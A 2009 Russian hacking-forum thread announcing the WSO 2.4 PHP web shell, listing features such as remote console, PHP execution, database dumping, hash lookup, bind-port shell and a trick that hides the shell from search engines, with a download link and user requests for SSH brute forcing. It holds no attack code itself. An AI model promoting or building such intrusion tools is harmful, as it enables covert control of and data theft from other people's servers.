Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Избранное (https://forum.antichat.xyz/forumdisplay.php?f=89)
-   -   WSO (веб-шелл) (https://forum.antichat.xyz/showthread.php?t=103155)

oRb 26.01.2009 12:21

WSO - веб-шелл
 
WSO2.4
Описание:
  • Авторизация
  • Информация о сервере
  • Файловый менеджер (Копирование, переименование, перемещение, удаление, чмод, тач, создание файлов и папок)
  • Просмотр, hexview, редактирование, давнлоад, аплоад файлов
  • Работа с zip архивами (упаковка, распаковка)
  • Консоль
  • SQL менеджер (MySql, PostgreSql)
  • Выполнение PHP кода
  • Работа со строками + поиск хеша в онлайн базах
  • Биндпорт и бек-коннект (Perl)
  • Поиск текста в файлах
  • *nix/Windows
Из фишек
  • Антипоисковик (проверяется User-Agent, если поисковик, тогда возвращается 404 ошибка)
  • Консолька запоминает введенные команды. (перемещаться по ним можно с помощью стрелок вверх, вниз при фокусе на поле для ввода)
  • Можно использовать AJAX
  • Малый вес (24.32 KB)
  • Выбор кодировки, в которой работает шелл.

Данная утилита предоставляет веб-интерфейс для удаленной работы c операционной системой и ее службами/демонами.
Использование данного продукта в незаконных целях грозит уголовной ответственностью.

Скачать: http://narod.ru/disk/18331224000/wso2.4.zip.html
Архив содержит последнюю версию шелла и небольшую тулзу WSOmanager - для работы с шеллами.

oRb 04.02.2009 12:16

Обновление:
  • Пофиксил баги
  • Мелкие исправления:
    - clear теперь очищает консоль, не делая запрос на сервер
    - При изменении кодировки, соединение с мускулом не "сбрасывается".
  • Добавлены
    - Bind port to /bin/bash
    - изменение даты модификации файла
  • Упаковал. Теперь вес (16 кб)
Первый пост обновил.

UPD:
еще несколько фиксов.
Спасибо: b3

oRb 20.02.2009 17:56

Обновление:
  • Уменьшен размер кода, генерируемого файловым менеджером
  • Добавлен новый сервис для расшифровки хеша
  • В файловом менеджере можно применять сортировки к столбцам
  • В SQL менеджере новый вывод таблиц (более наглядный, подсчет записей в каждой таблице)
  • Записи с длинным полями отображаются в компактном виде
  • Сделал возможность дампа бд. Можно выбирать конкретные таблицы.
  • В меню выделяется раздел, в котором находишься
  • Все формы в разделе Tools теперь нормальные (отправляются по enter'у)
  • Код местами переписан, + исправлены мелкие баги.

Отредактировал первый пост.

x-demon 24.02.2009 10:59

Отличная вещь. дизайн бы правда сменить :)

oRb 24.02.2009 22:06

Цитата:

Сообщение от x-demon
дизайн бы правда сменить :)

Скоро займусь 2й версией. По планам много будет изменено, дизайн в том числе.

heretic1990 24.02.2009 23:47

Цитата:

Сообщение от x-demon
Отличная вещь. дизайн бы правда сменить :)

главное не дизайн, а функционал.

п.с. зачётный шелл!

oRb 26.02.2009 00:36

Небольшие фиксы:
- нормальная работа при safe-mode
- после соединения с mysql сервером, кодировка устанавливалась с помощью функции mysql_set_charset. Почитал мануал повнимательней: PHP 5 >= 5.2.3. Пофиксил.

Велемир 21.03.2009 14:28

Опаньки)Ща испробуем.Будет ещё обновляться что-нить ?):)

1)Или мне кажется,или r99 быстрее)
2) Я за смену дизайна:)(как у эрки) ).
3) Хорошо б замутить брут ssh+Брут по словарю))))))))
4)Бэкконекта чет не вижу,а вот биндя есть:).


ЗЫ:Лови плюськи )

Обновляемый проект - хороший проект))).Буду(лично я - да) ждать с ультрамеганетерпением:)

oRb 21.03.2009 17:16

Цитата:

Будет ещё обновляться что-нить ?)
Да, сейчас пишу вторую версию (переписываю с нуля). Будет заметно больше функционала, обновленный диз и нормальная кроссплатформенность.
Цитата:

1)Или мне кажется,или r99 быстрее)
не совсем понял, что ты имел в виду (c99 или r57). Все зависит от много, в том числе, какой именно функционал шелла используется. Но по скорости они не должны заметно отличаться.
Цитата:

3) Хорошо б замутить брут ssh+Брут по словарю))))))))
по словарю будет, ssh - посмотрим.
Цитата:

4)Бэкконекта чет не вижу,а вот биндя есть
да, его там нет, сам его написать не мог, а чужой код вставлять не хотелось.

astrologer 21.03.2009 22:58

Код:

if (($perms & 0xC000) == 0xC000) $info = 's';
else if (($perms & 0xA000) == 0xA000) $info = 'l';
else if (($perms & 0x8000) == 0x8000) $info = '-';
else if (($perms & 0x6000) == 0x6000) $info = 'b';
else if (($perms & 0x4000) == 0x4000) $info = 'd';
else if (($perms & 0x2000) == 0x2000) $info = 'c';
else if (($perms & 0x1000) == 0x1000) $info = 'p';
else $info = 'u';

Можно же сдвинуть вправо на 12 бит


Время: 22:40